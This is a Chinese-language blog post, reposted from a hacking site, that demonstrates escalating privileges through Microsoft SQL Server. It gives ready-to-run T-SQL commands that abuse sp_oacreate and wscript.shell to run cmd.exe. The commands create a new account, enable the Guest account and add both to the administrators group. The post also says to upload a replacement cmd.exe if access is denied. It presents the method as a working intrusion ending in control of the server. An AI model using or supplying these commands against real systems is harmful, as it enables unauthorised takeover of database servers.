SQL提权演示

2009年4月21日星期二 | | |

 
 
SQL提权演示
  首先想给大家了解一下SQL提权常用命令:
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名  --连接数据库。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'  --添加新用户。
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'  --把用户加到管理组
  如果以上添加管理员失败的时候,我们可以尝试激活Guest。
eclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'  --激活GUEST用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'  --把Guest加到管理组
  注意:如果c:\windows\system32\cmd.exe 被删除,没权限访问或者拒绝访问的话,我们可以自己上传个CMD上去,然后路径修改我们上传的CMD路径就可以了。
 
下面给大家演示一下整个SQL提权的过程:
默认GUEST用户密码为空禁用状态!
激活GUEST用户

激活GUEST用户成功,但是没有权限,所以我们继续把GUEST这个用户添加到管理组!
把Guest加到管理组

成功把GUEST加到了管理组,成功进入了服务器!

进去后能做些什么?相信这个就不用我罗嗦了。
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text2/200807/10572.html

我的QQ空间
Mysql+PHPmyadmin提权技巧
Mysql+PHPmyadmin提权技巧本篇文章来源于 新世纪网安基地 (www.5...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]